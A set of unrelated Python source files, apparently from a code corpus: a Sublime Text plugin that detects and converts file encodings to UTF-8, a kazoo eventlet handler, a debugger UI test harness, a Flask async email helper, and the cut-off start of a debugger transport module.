'GBK': 'GB18030',
'BIG5': 'CP950', # CP950 is common in Taiwan
'CP950': 'BIG5-HKSCS', # HK official Big5 variant
'EUC-KR': 'CP949' # CP949 is a superset of euc-kr!
}
SETTINGS = {}
REVERTING_FILES = []
CONFIRM_IS_AVAILABLE = ('ok_cancel_dialog' in dir(sublime))
ENCODINGS_NAME = []
ENCODINGS_CODE = []
class EncodingCache(object):
def __init__(self):
self.file = os.path.join(sublime.packages_path(), 'User', 'encoding_cache.json')
self.cache = []
self.max_size = -1
self.dirty = False
self.load()
def save_on_dirty(self):
if self.dirty:
return
self.dirty = True
sublime.set_timeout(self.save, 10000)
def shrink(self):
if self.max_size < 0:
return
if len(self.cache) > self.max_size:
self.save_on_dirty()
del self.cache[self.max_size:]
def set_max_size(self, max_size):
self.max_size = max_size
self.shrink()
def load(self):
if not os.path.exists(self.file):
return
fp = open(self.file, 'r')
try:
self.cache = json.load(fp)
except ValueError:
# the cache file is corrupted
return
finally:
fp.close()
if len(self.cache) > 0:
if 'file' in self.cache[0]:
# old style cache
new_cache = []
for item in self.cache:
new_cache.append({
item['file']: item['encoding']
})
self.cache = new_cache
self.save_on_dirty()
def save(self):
self.shrink()
fp = open(self.file, 'w')
json.dump(self.cache, fp)
fp.close()
self.dirty = False
def get(self, file_name):
for item in self.cache:
if file_name in item:
return item.get(file_name)
return None
def pop(self, file_name):
for item in self.cache:
if file_name in item:
self.cache.remove(item)
self.save_on_dirty()
return item.get(file_name)
return None
def set(self, file_name, encoding):
if self.max_size < 1:
return
self.pop(file_name)
self.cache.insert(0, {
file_name: encoding
})
self.save_on_dirty()
encoding_cache = None
OPT_MAP = {
'convert_and_open': True,
'no_action': False,
'always': True,
'never': False,
True: True,
False: False
}
def get_settings():
global ENCODINGS_NAME, ENCODINGS_CODE
settings = sublime.load_settings('ConvertToUTF8.sublime-settings')
encoding_list = settings.get('encoding_list', [])
ENCODINGS_NAME = [pair[0] for pair in encoding_list]
ENCODINGS_CODE = [pair[1] for pair in encoding_list]
encoding_cache.set_max_size(settings.get('max_cache_size', 100))
SETTINGS['max_detect_lines'] = settings.get('max_detect_lines', 600)
SETTINGS['preview_action'] = OPT_MAP.get(settings.get('preview_action', False))
SETTINGS['default_encoding_on_create'] = settings.get('default_encoding_on_create', '')
SETTINGS['convert_on_load'] = OPT_MAP.get(settings.get('convert_on_load', True))
SETTINGS['convert_on_save'] = OPT_MAP.get(settings.get('convert_on_save', True))
SETTINGS['lazy_reload'] = settings.get('lazy_reload', True)
SETTINGS['convert_on_find'] = settings.get('convert_on_find', False)
SETTINGS['confidence'] = settings.get('confidence', 0.95)
def get_setting(view, key):
# read project specific settings first
return view.settings().get(key, SETTINGS[key]);
TMP_DIR = None
def get_temp_name(name):
if not name:
return None
name = name.encode('UTF-8')
return hashlib.md5(name).hexdigest()
def clean_temp_folder():
tmp_files = os.listdir(TMP_DIR)
for win in sublime.windows():
for view in win.views():
file_name = view.file_name()
tmp_name = get_temp_name(file_name)
if tmp_name in tmp_files:
if not view.is_dirty():
tmp_file = os.path.join(TMP_DIR, tmp_name)
# check mtime
mtime1 = os.path.getmtime(file_name)
mtime2 = os.path.getmtime(tmp_file)
if mtime1 != mtime2:
# file was changed outside
view.settings().erase('prevent_detect')
continue
shutil.move(tmp_file, file_name)
tmp_files.remove(tmp_name)
for tmp_name in tmp_files:
tmp_file = os.path.join(TMP_DIR, tmp_name)
os.unlink(tmp_file)
def init_settings():
global encoding_cache, TMP_DIR
encoding_cache = EncodingCache()
get_settings()
sublime.load_settings('ConvertToUTF8.sublime-settings').add_on_change('get_settings', get_settings)
TMP_DIR = os.path.join(sublime.packages_path(), 'User', 'c2u_tmp')
if not os.path.exists(TMP_DIR):
os.mkdir(TMP_DIR)
def setup_views():
clean_temp_folder()
# check existing views
for win in sublime.windows():
for view in win.views():
if not get_setting(view, 'convert_on_load'):
break
view.settings().set('is_init_dirty_state', view.is_dirty())
if view.is_dirty() or view.settings().get('origin_encoding'):
show_encoding_status(view)
continue
file_name = view.file_name()
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def plugin_loaded():
init_settings()
setup_views()
def plugin_unloaded():
encoding_cache = None
sublime.load_settings('ConvertToUTF8.sublime-settings').clear_on_change('get_settings')
def wait_for_ready():
if sublime.windows():
setup_views()
else:
sublime.set_timeout(wait_for_ready, 100)
if not ST3:
init_settings()
wait_for_ready()
def detect(view, file_name, cnt):
if not file_name or not os.path.exists(file_name) or os.path.getsize(file_name) == 0:
return
encoding = encoding_cache.pop(file_name)
if encoding:
sublime.set_timeout(lambda: init_encoding_vars(view, encoding, detect_on_fail=True), 0)
return
sublime.set_timeout(lambda: view.set_status('origin_encoding', 'Detecting encoding, please wait...'), 0)
detector = UniversalDetector()
fp = open(file_name, 'rb')
for line in fp:
# cut MS-Windows CR code
line = line.replace(b'\r',b'')
detector.feed(line)
cnt -= 1
if detector.done or cnt == 0:
break
fp.close()
detector.close()
encoding = detector.result['encoding']
if encoding:
encoding = encoding.upper()
confidence = detector.result['confidence']
sublime.set_timeout(lambda: check_encoding(view, encoding, confidence), 0)
def check_encoding(view, encoding, confidence):
view_encoding = view.encoding()
result = 'Detected {0} vs {1} with {2:.0%} confidence'.format(encoding, view_encoding, confidence) if encoding else 'Encoding can not be detected'
view.set_status('origin_encoding', result)
print(result)
not_detected = not encoding or confidence < SETTINGS['confidence'] or encoding == view_encoding
# ST can't detect the encoding
if view_encoding in ('Undefined', view.settings().get('fallback_encoding')):
if not_detected:
show_selection(view)
return
else:
if not_detected:
# using encoding detected by ST
encoding = view_encoding
else:
show_selection(view, [
['{0} ({1:.0%})'.format(encoding, confidence), encoding],
['{0}'.format(view_encoding), view_encoding]
])
return
init_encoding_vars(view, encoding)
def show_encoding_status(view):
encoding = view.settings().get('force_encoding')
if not encoding:
encoding = view.settings().get('origin_encoding')
if not encoding:
return
view.set_status('origin_encoding', encoding)
def init_encoding_vars(view, encoding, run_convert=True, stamp=None, detect_on_fail=False):
if not encoding:
return
view.settings().set('origin_encoding', encoding)
show_encoding_status(view)
if encoding in SKIP_ENCODINGS or encoding == view.encoding():
encoding_cache.set(view.file_name(), encoding)
return
view.settings().set('in_converting', True)
if run_convert:
if stamp == None:
stamp = '{0}'.format(time.time())
translate_tabs_to_spaces = view.settings().get('translate_tabs_to_spaces')
view.settings().set('translate_tabs_to_spaces', False)
view.run_command('convert_to_utf8', {'detect_on_fail': detect_on_fail, 'stamp': stamp})
view.settings().set('translate_tabs_to_spaces', translate_tabs_to_spaces)
def clean_encoding_vars(view):
view.settings().erase('in_converting')
view.settings().erase('origin_encoding')
view.erase_status('origin_encoding')
view.set_scratch(False)
encoding_cache.pop(view.file_name())
def remove_reverting(file_name):
while file_name in REVERTING_FILES:
REVERTING_FILES.remove(file_name)
class EncodingSelection(threading.Thread):
def __init__(self, view, names, codes):
threading.Thread.__init__(self)
self.view = view
self.names = names
self.codes = codes
def run(self):
sublime.set_timeout(self.show_panel, 0)
def show_panel(self):
window = self.view.window()
if window:
window.show_quick_panel(self.names, self.on_done)
def on_done(self, selected):
if selected == -1:
clean_encoding_vars(self.view)
else:
init_encoding_vars(self.view, self.codes[selected])
def show_selection(view, encoding_list = None):
if encoding_list:
names = [pair[0] for pair in encoding_list]
codes = [pair[1] for pair in encoding_list]
else:
names = ENCODINGS_NAME
codes = ENCODINGS_CODE
EncodingSelection(view, names, codes).start()
class ReloadWithEncoding(threading.Thread):
def __init__(self, view, encoding):
threading.Thread.__init__(self)
self.view = view
self.encoding = encoding
def run(self):
sublime.set_timeout(self.reload, 0)
def reload(self):
init_encoding_vars(self.view, self.encoding)
def reload_encoding(view, encoding):
ReloadWithEncoding(view, encoding).start()
stamps = {}
class ShowEncodingSelectionCommand(sublime_plugin.TextCommand):
def run(self, edit):
show_selection(self.view)
class ReloadWithEncodingCommand(sublime_plugin.TextCommand):
def run(self, edit, encoding):
reload_encoding(self.view, encoding)
class PyInstructionCommand(sublime_plugin.TextCommand):
def get_branch(self, platform, arch):
return [{
'linux-x64': 'master',
'linux-x32': 'x32',
}, {
'linux-x64': 'linux-x64',
'linux-x32': 'linux-x32',
'osx-x64': 'osx',
}][ST3].get(platform + '-' + arch)
def run(self, edit, encoding, file_name, need_codecs):
self.view.set_name('ConvertToUTF8 Instructions')
self.view.set_scratch(True)
self.view.settings().set("word_wrap", True)
msg = 'File: {0}\nEncoding: {1}\nError: '.format(file_name, encoding)
if need_codecs:
msg = msg + 'Codecs missing\n\n'
branch = self.get_branch(sublime.platform(), sublime.arch())
if branch:
ver = '33' if ST3 else '26'
msg = msg + 'Please install Codecs{0} plugin (https://github.com/seanliang/Codecs{0}/tree/{1}).\n'.format(ver, branch)
else:
import platform
msg = msg + 'Please send the following information to sunlxy (at) yahoo.com:\n====== Debug Information ======\nVersion: {0}-{1}\nPlatform: {2}\nPath: {3}\nEncoding: {4}\n'.format(
sublime.version(), sublime.arch(), platform.platform(), sys.path, encoding
)
else:
msg = msg + 'Unsupported encoding, see http://docs.python.org/library/codecs.html#standard-encodings\n\nPlease try other tools such as iconv.\n'
self.view.insert(edit, 0, msg)
self.view.set_read_only(True)
self.view.window().focus_view(self.view)
class ConvertToUtf8Command(sublime_plugin.TextCommand):
def run(self, edit, encoding=None, stamp=None, detect_on_fail=False):
view = self.view
if encoding:
view.settings().set('force_encoding', encoding)
origin_encoding = view.settings().get('origin_encoding')
# convert only when ST can't load file properly
run_convert = (view.encoding() == view.settings().get('fallback_encoding'))
if origin_encoding:
if origin_encoding == encoding:
return
view.set_scratch(False)
run_convert = False
init_encoding_vars(view, encoding, run_convert, stamp)
return
else:
encoding = view.settings().get('origin_encoding')
if not encoding:
return
file_name = view.file_name()
if not (file_name and os.path.exists(file_name)):
return
# try fast decode
fp = None
try:
fp = codecs.open(file_name, 'rb', encoding, errors='strict')
contents = fp.read()
except LookupError as e:
try:
# reload codecs
import _multibytecodec, imp, encodings
imp.reload(encodings)
imp.reload(codecs)
codecs.getencoder(encoding)
view.run_command('reload_with_encoding', {'encoding': encoding})
except (ImportError, LookupError) as e:
need_codecs = (type(e) == ImportError)
clean_encoding_vars(view)
view.window().new_file().run_command('py_instruction', {'encoding': encoding, 'file_name': file_name, 'need_codecs': need_codecs})
return
except UnicodeDecodeError as e:
if detect_on_fail:
detect(view, file_name, get_setting(view, 'max_detect_lines'))
return
superset = SUPERSETS.get(encoding)
if superset:
print('Try encoding {0} instead of {1}.'.format(superset, encoding))
init_encoding_vars(view, superset, True, stamp)
return
if CONFIRM_IS_AVAILABLE:
if sublime.ok_cancel_dialog(u'Errors occurred while converting {0} with {1} encoding.\n\n'
'WARNING: Continue to load this file using {1}, malformed data will be ignored.'
'\n\nPress "Cancel" to choose another encoding manually.'.format
(os.path.basename(file_name), encoding)):
fp.close()
fp = codecs.open(file_name, 'rb', encoding, errors='ignore')
contents = fp.read()
else:
show_selection(view)
return
else:
view.set_status('origin_encoding', u'Errors occurred while converting {0} with {1} encoding'.format
(os.path.basename(file_name), encoding))
show_selection(view)
return
finally:
if fp:
fp.close()
encoding_cache.set(file_name, encoding)
contents = contents.replace('\r\n', '\n').replace('\r', '\n')
regions = sublime.Region(0, view.size())
sel = view.sel()
rs = [(view.rowcol(x.a), view.rowcol(x.b)) for x in sel]
vp = view.viewport_position()
view.set_viewport_position((0, 0), False)
view.replace(edit, regions, contents)
sel.clear()
for x in rs:
sel.add(self.find_region(x))
view.set_viewport_position(vp, False)
stamps[file_name] = stamp
sublime.status_message('{0} -> UTF8'.format(encoding))
def find_region(self, reg):
view = self.view
(x1, y1), (x2, y2) = reg
reverse = x1 > x2 or (x1 == x2 and y1 > y2)
# swap these two points for easy computing
if reverse:
(x1, y1), (x2, y2) = (x2, y2), (x1, y1)
_, end1 = view.rowcol(view.line(view.text_point(x1, 0)).b)
# exceed one line, narrow the selection
if y1 > end1:
# forward to end
y1 = end1
if x1 == x2:
if y2 > end1:
# backward to start
y2 = y1
else:
_, end2 = view.rowcol(view.line(view.text_point(x2, 0)).b)
if y2 > end2:
# backward to beginning
y2 = 0
pt0 = view.text_point(x1, y1)
pt1 = view.text_point(x2, y2)
# swap the points back
if reverse:
pt0, pt1 = pt1, pt0
return sublime.Region(pt0, pt1)
def description(self):
encoding = self.view.settings().get('origin_encoding')
if not encoding:
return
return '{0} -> UTF8'.format(encoding)
def is_enabled(self):
return self.view.encoding() != 'Hexadecimal'
class ConvertFromUtf8Command(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
encoding = view.settings().get('force_encoding')
if not encoding:
encoding = view.settings().get('origin_encoding')
file_name = view.file_name()
if not encoding or encoding == 'UTF-8':
encoding_cache.pop(file_name)
return
# remember current folded regions
regions = [[x.a, x.b] for x in view.folded_regions()]
if regions:
view.settings().set('folded_regions', regions)
vp = view.viewport_position()
view.settings().set('viewport_position', [vp[0], vp[1]])
fp = None
try:
fp = open(file_name, 'rb')
contents = codecs.EncodedFile(fp, encoding, 'UTF-8').read()
except (LookupError, UnicodeEncodeError) as e:
sublime.error_message(u'Can not convert file encoding of {0} to {1}, it was saved as UTF-8 instead:\n\n{2}'.format
(os.path.basename(file_name), encoding, e))
return
finally:
if fp:
fp.close()
# write content to temporary file
tmp_name = os.path.join(TMP_DIR, get_temp_name(file_name))
fp = open(tmp_name, 'wb')
fp.write(contents)
fp.close()
if not get_setting(view, 'lazy_reload'):
# os.rename has "Invalid cross-device link" issue
os.chmod(tmp_name, os.stat(file_name)[0])
shutil.move(tmp_name, file_name)
else:
# copy the timestamp from original file
mtime = os.path.getmtime(file_name)
os.utime(tmp_name, (mtime, mtime))
encoding_cache.set(file_name, encoding)
view.settings().set('prevent_detect', True)
sublime.status_message('UTF8 -> {0}'.format(encoding))
def description(self):
encoding = self.view.settings().get('origin_encoding')
if not encoding:
return
return 'UTF8 -> {0}'.format(encoding)
class ConvertTextToUtf8Command(sublime_plugin.TextCommand):
def get_text(self, region):
content = self.view.substr(region)
try:
return content.encode('CP1252')
except Exception:
return None
def detect(self, begin_line, end_line):
begin_line = int(begin_line)
end_line = int(end_line)
begin_point = self.view.text_point(begin_line + 1, 0)
end_point = self.view.text_point(end_line, 0) - 1
region = sublime.Region(begin_point, end_point)
content = self.get_text(region)
if not content:
return
detector = UniversalDetector()
detector.feed(content)
detector.close()
encoding = detector.result['encoding']
confidence = detector.result['confidence']
encoding = encoding.upper()
if confidence < SETTINGS['confidence'] or encoding in SKIP_ENCODINGS:
return
self.view.run_command('convert_text_to_utf8', {'begin_line': begin_line, 'end_line': end_line, 'encoding': encoding})
def run(self, edit, begin_line, end_line, encoding = None):
begin_line = int(begin_line)
end_line = int(end_line)
if not encoding:
# detect the encoding
sublime.set_timeout(lambda: self.detect(begin_line, end_line), 0)
return
view = self.view
last_line = begin_line + 50
if last_line > end_line:
last_line = end_line
begin_point = view.text_point(begin_line + 1, 0)
end_point = view.text_point(last_line, 0) - 1
region = sublime.Region(begin_point, end_point)
text = self.get_text(region)
while True:
if encoding:
try:
text = text.decode(encoding)
except UnicodeDecodeError:
encoding = SUPERSETS.get(encoding)
continue
break
else:
return
view.replace(edit, region, text)
if last_line < end_line:
view.run_command('convert_text_to_utf8', {'begin_line': last_line, 'end_line': end_line, 'encoding': encoding})
def is_enabled(self):
return get_setting(self.view, 'convert_on_find')
class ConvertToUTF8Listener(sublime_plugin.EventListener):
def is_find_results(self, view):
return view.settings().get('syntax') == 'Packages/Default/Find Results.hidden-tmLanguage'
def check_clones(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
if clone_numbers:
check_times = view.settings().get('check_times', clone_numbers)
if check_times:
view.settings().set('check_times', check_times - 1)
return True
view.settings().erase('check_times')
return False
def on_new(self, view):
if self.is_find_results(view):
view.settings().set('last_lines', 0)
return
if get_setting(view, 'default_encoding_on_create'):
init_encoding_vars(view, get_setting(view, 'default_encoding_on_create'), False)
def on_clone(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
view.settings().set('clone_numbers', clone_numbers + 1)
encoding = view.settings().get('origin_encoding')
if encoding:
view.set_status('origin_encoding', encoding)
def on_close(self, view):
clone_numbers = view.settings().get('clone_numbers', 0)
if clone_numbers:
view.settings().set('clone_numbers', clone_numbers - 1)
else:
remove_reverting(view.file_name())
if self.is_find_results(view):
view.settings().erase('last_lines')
def on_load(self, view):
encoding = view.encoding()
if encoding == 'Hexadecimal' or encoding.endswith(' BOM'):
return
#if sublime text already load right, no need to check the file's encoding
if encoding not in ('Undefined', view.settings().get('fallback_encoding')):
return
file_name = view.file_name()
if not file_name:
return
if self.check_clones(view):
return
encoding = view.settings().get('origin_encoding')
if encoding and not view.get_status('origin_encoding'):
view.set_status('origin_encoding', encoding)
# file is reloading
if view.settings().get('prevent_detect'):
if view.is_dirty():
# changes have not been saved
sublime.set_timeout(lambda: self.on_deactivated(view), 0)
return
else:
# treat as a new file
sublime.set_timeout(lambda: self.clean_reload(view, file_name), 250)
return
else:
return
if not get_setting(view, 'convert_on_load'):
return
self.perform_action(view, file_name, 5)
def on_activated(self, view):
if view.settings().get('is_preview'):
self.perform_action(view, view.file_name(), 3)
def is_preview(self, view):
window = view.window()
if not window:
return True
view_index = window.get_view_index(view)
return view_index[1] == -1
def clean_reload(self, view, file_name):
window = view.window()
if not window:
sublime.set_timeout(lambda: self.clean_reload(view, file_name), 100)
return
for v in window.views():
if v.file_name() == file_name:
v.settings().erase('prevent_detect')
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def perform_action(self, view, file_name, times):
if not get_setting(view, 'preview_action') and self.is_preview(view):
if times > 0:
# give it another chance before everything is ready
sublime.set_timeout(lambda: self.perform_action(view, file_name, times - 1), 100)
return
view.settings().set('is_preview', True)
return
view.settings().erase('is_preview')
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
def on_modified(self, view):
encoding = view.encoding()
if encoding == 'Hexadecimal':
return
file_name = view.file_name()
if not file_name or view.is_loading():
if get_setting(view, 'convert_on_find') and self.is_find_results(view):
begin_line = view.settings().get('last_lines', 0)
end_line = view.rowcol(view.size())[0]
if end_line > begin_line:
view.settings().set('last_lines', end_line)
begin_point = view.text_point(begin_line, 0)
line = view.line(begin_point)
text = view.substr(line)
if text.endswith(':'):
# find the file name
file_name = text[:-1]
# skip opened file
if view.window().find_open_file(file_name):
return
encoding = encoding_cache.get(file_name)
if encoding in SKIP_ENCODINGS:
return
sublime.set_timeout(lambda: view.run_command('convert_text_to_utf8', {'begin_line': begin_line, 'end_line': end_line, 'encoding': encoding}), 0)
return
if not view.settings().get('in_converting'):
if view.settings().get('is_preview'):
view.settings().erase('is_preview')
detect(view, file_name, get_setting(view, 'max_detect_lines'))
return
if self.check_clones(view):
return
command = view.command_history(0, True)
command1 = view.command_history(1, True)
if command == NONE_COMMAND:
if command1[0] == 'convert_to_utf8':
view.run_command('redo')
else:
view.set_scratch(not view.settings().get('is_init_dirty_state', False))
elif command[0] == 'convert_to_utf8':
if file_name in stamps:
if stamps[file_name] == command[1].get('stamp'):
view.set_scratch(True)
elif command[0] == 'revert':
if command1 == NONE_COMMAND:
# on_modified will be invoked twice for each revert
if file_name not in REVERTING_FILES:
REVERTING_FILES.insert(0, file_name)
return
remove_reverting(file_name)
if view.settings().get('prevent_detect'):
sublime.set_timeout(lambda: self.undo_me(view), 0)
else:
# file was modified outside
cnt = get_setting(view, 'max_detect_lines')
threading.Thread(target=lambda: detect(view, file_name, cnt)).start()
else:
view.set_scratch(False)
def undo_me(self, view):
view.settings().erase('prevent_detect')
view.run_command('undo')
# restore folded regions
regions = view.settings().get('folded_regions')
if regions:
view.settings().erase('folded_regions')
folded = [sublime.Region(int(region[0]), int(region[1])) for region in regions]
view.fold(folded)
vp = view.settings().get('viewport_position')
if vp:
view.settings().erase('viewport_position')
view.set_viewport_position((vp[0], vp[1]), False)
# st3 will reload file immediately
if view.settings().get('revert_to_scratch') or (ST3 and not get_setting(view, 'lazy_reload')):
view.set_scratch(True)
def on_deactivated(self, view):
# st2 will reload file when on_deactivated
if view.settings().get('prevent_detect'):
file_name = view.file_name()
if get_setting(view, 'lazy_reload'):
tmp_name = os.path.join(TMP_DIR, get_temp_name(file_name))
os.chmod(tmp_name, os.stat(file_name)[0])
shutil.move(tmp_name, file_name)
remove_reverting(file_name)
view.settings().set('revert_to_scratch', not view.is_dirty())
# make ST stop asking about reloading
view.run_command('revert')
def on_pre_save(self, view):
if view.encoding() == 'Hexadecimal' or view.encoding().endswith(' BOM'):
return
force_encoding = view.settings().get('force_encoding')
if force_encoding == 'UTF-8':
view.set_encoding(force_encoding)
return
if not view.settings().get('in_converting'):
return
if self.check_clones(view):
return
view.set_encoding('UTF-8')
def on_post_save(self, view):
view_encoding = view.encoding()
if view_encoding == 'Hexadecimal':
return
if not view.settings().get('in_converting'):
return
if self.check_clones(view):
return
file_name = view.file_name()
if file_name in stamps:
del stamps[file_name]
if not get_setting(view, 'convert_on_save'):
return
# file was saved with other encoding
if view_encoding != 'UTF-8':
clean_encoding_vars(view)
return
view.run_command('convert_from_utf8')
|
eventlet.py
|
"""A eventlet based handler."""
from __future__ import absolute_import
import contextlib
import logging
import eventlet
from eventlet.green import select as green_select
from eventlet.green import socket as green_socket
from eventlet.green import time as green_time
from eventlet.green import threading as green_threading
from eventlet import queue as green_queue
from kazoo.handlers import utils
import kazoo.python2atexit as python2atexit
LOG = logging.getLogger(__name__)
# sentinel objects
_STOP = object()
@contextlib.contextmanager
def _yield_before_after():
# Yield to any other co-routines...
#
# See: http://eventlet.net/doc/modules/greenthread.html
# for how this zero sleep is really a cooperative yield to other potential
# co-routines...
eventlet.sleep(0)
try:
yield
finally:
eventlet.sleep(0)
class TimeoutError(Exception):
pass
class AsyncResult(utils.AsyncResult):
"""A one-time event that stores a value or an exception"""
def __init__(self, handler):
super(AsyncResult, self).__init__(handler,
green_threading.Condition,
TimeoutError)
class SequentialEventletHandler(object):
"""Eventlet handler for sequentially executing callbacks.
This handler executes callbacks in a sequential manner. A queue is
created for each of the callback events, so that each type of event
has its callback type run sequentially. These are split into two
queues, one for watch events and one for async result completion
callbacks.
Each queue type has a greenthread worker that pulls the callback event
off the queue and runs it in the order the client sees it.
This split helps ensure that watch callbacks won't block session
re-establishment should the connection be lost during a Zookeeper
client call.
Watch and completion callbacks should avoid blocking behavior as
the next callback of that type won't be run until it completes. If
you need to block, spawn a new greenthread and return immediately so
callbacks can proceed.
.. note::
Completion callbacks can block to wait on Zookeeper calls, but
no other completion callbacks will execute until the callback
returns.
"""
name = "sequential_eventlet_handler"
def __init__(self):
"""Create a :class:`SequentialEventletHandler` instance"""
self.callback_queue = green_queue.LightQueue()
self.completion_queue = green_queue.LightQueue()
self._workers = []
self._started = False
@staticmethod
def sleep_func(wait):
green_time.sleep(wait)
@property
def running(self):
return self._started
timeout_exception = TimeoutError
def _process_completion_queue(self):
while True:
cb = self.completion_queue.get()
if cb is _STOP:
break
try:
with _yield_before_after():
cb()
except Exception:
LOG.warning("Exception in worker completion queue greenlet",
exc_info=True)
def _process_callback_queue(self):
while True:
cb = self.callback_queue.get()
if cb is _STOP:
break
try:
with _yield_before_after():
cb()
except Exception:
LOG.warning("Exception in worker callback queue greenlet",
exc_info=True)
def start(self):
if not self._started:
# Spawn our worker threads, we have
# - A callback worker for watch events to be called
# - A completion worker for completion events to be called
w = eventlet.spawn(self._process_completion_queue)
self._workers.append((w, self.completion_queue))
w = eventlet.spawn(self._process_callback_queue)
self._workers.append((w, self.callback_queue))
self._started = True
python2atexit.register(self.stop)
def stop(self):
while self._workers:
w, q = self._workers.pop()
q.put(_STOP)
w.wait()
self._started = False
python2atexit.unregister(self.stop)
def socket(self, *args, **kwargs):
return utils.create_tcp_socket(green_socket)
def create_socket_pair(self):
return utils.create_socket_pair(green_socket)
def event_object(self):
return green_threading.Event()
def lock_object(self):
return green_threading.Lock()
def rlock_object(self):
return green_threading.RLock()
def create_connection(self, *args, **kwargs):
return utils.create_tcp_connection(green_socket, *args, **kwargs)
def select(self, *args, **kwargs):
with _yield_before_after():
return green_select.select(*args, **kwargs)
def async_result(self):
return AsyncResult(self)
def spawn(self, func, *args, **kwargs):
t = green_threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def dispatch_callback(self, callback):
self.callback_queue.put(lambda: callback.func(*callback.args))
|
__init__.py
|
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import threading
import Queue
import ui
import time
import gc
import traceback
from util.logging import *
from util.message_loop import *
# a run command issued to the UI is treated as hung if this many seconds elapse
UI_THREAD_TIMEOUT = 10
class UIThreadException(Exception):
def __init__(self,exc,msg):
self._inner_exception = exc
self._message = msg
@property
def inner_exception():
self._inner_exception
def __str__(self):
return self._message
class UITimeoutException(Exception):
pass
class UITestHarness(object):
def __init__(self,options=None):
self._mc = None
self._loaded = threading.Event()
self._options = options
log2("UITestHarness: Starting UI")
self._ui_thread = threading.Thread(target=self._ui_main)
self._ui_thread.setName("ndbg UI thread")
self._ui_thread.start()
log2("UITestHarness: *********************************")
log2("UITestHarness: Waiting for UI to become responsive")
self._loaded.wait(5)
if not self._loaded.is_set():
log2("UITestHarness: UI is not responding. Test harness init failed.")
raise Exception("Timed out initializing the UI")
log2("UITestHarness: UI is up.")
self._loaded = None
def _ui_main(self):
log2("UI thread: ui running.")
def on_load_cb(mc):
log2("UI thread: ui loaded. Notifying test thread.")
self._mc = mc
self._loaded.set()
ui.run(self._options, on_load_cb)
log2("UI thread: ui stoped.")
def run_on_ui(self,cb,timeout):
"""Runs cb(mc) on the UI thread, where mc is the MainControl object for the UI.
timeout is the amount of time to wait before considering the test hung.
"""
exceptions = []
ret = []
done_event = threading.Event()
def run_uitest_cmd():
log2("UI thread: run_uitest_cmd begin...")
if MessageLoop.has_unhandled_exceptions():
excs = MessageLoop.get_unhandled_exceptions()
assert len(excs) != 0
uberexc = "Original exception:\n" + "\n\n".join(excs)
MessageLoop.reset_unhandled_exceptions()
exceptions.append(Exception("Unhandled exceptions"))
exceptions.append(uberexc)
log2("UI thread: run_uitest_cmd aborted due to unhandled exceptions.")
done_event.set()
return
try:
rv = cb(self._mc)
ret.append(rv)
except Exception,exc:
log2("Exception raised when processing an add_message")
fmt = traceback.format_exc()
exceptions.append(exc)
exceptions.append(fmt)
log2("UI thread: run_uitest_cmd done.")
done_event.set()
MessageLoop.add_message(run_uitest_cmd)
done_event.wait(timeout=timeout)
if not done_event.is_set():
log2("UITestHarness: run_uitest_cmd timed out.")
raise UITimeoutException("Test timed out.")
else:
log2("UITestHarness: run_uitest_cmd done.")
if len(ret):
return ret[0]
else:
exc = exceptions[0]
formatted_exc = exceptions[1]
raise UIThreadException(exc, formatted_exc)
def tearDown(self):
log2("UITestHarness: Begin teardown")
if self._ui_thread == None:
log2("UITestHarness: Teardown stopped, already torn down")
return
log2("UITestHarness: Telling UI thread to exit.")
MessageLoop.quit()
# wait for the UI thread to exit
self._ui_thread.join()
self._ui_thread = None
self._mc = None
log2("UITestHarness: UI thread has exited. Teardown complete.")
gc.collect()
class UITestCaseBase(unittest.TestCase):
def setUp(self,options=None):
self._harness = UITestHarness(options)
def run_on_ui(self, cb, timeout=UI_THREAD_TIMEOUT):
"""Runs cb(mc) on the UI thread. The return value or excception
are returned synchronously to the test thread."""
return self._harness.run_on_ui(cb,timeout)
def assertNoUnhandledExceptions(self):
def do_nothing(mc):
pass
self.run_on_ui(do_nothing)
def pause(self):
import sys
sys.stdout.write("Press enter to continue test...\n")
sys.stdin.readline()
def tearDown(self):
self._harness.tearDown()
class UITestCaseSingle(UITestCaseBase):
def setUp(self,testapp,options=None):
UITestCaseBase.setUp(self,options)
self.run_on_ui(lambda mc: mc.debugger.begin_launch_suspended(testapp).wait())
class UITestCaseMultiple(UITestCaseBase):
def setUp(self,launch,options=None):
"""Initializes the UI with the specified options and launches the
specified applications.
launch should be a list of applications or applications + arguments to launch_suspended.
options is the ndbg-style options result from optparse to be passed to the UI.
"""
UITestCaseBase.setUp(self,options)
i = 1
for testapp in launch:
proc = self.run_on_ui(lambda mc: mc.debugger.begin_launch_suspended(testapp).wait())
attrname = "proc%i" % i
setattr(self,attrname,proc)
i += 1
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['EMAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['EMAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
transports.py
|
from ...typecheck import *
from ...import core
from ..dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: List[str]) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command))
def __init__(self, command: List[str], cwd: Optional[str]):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
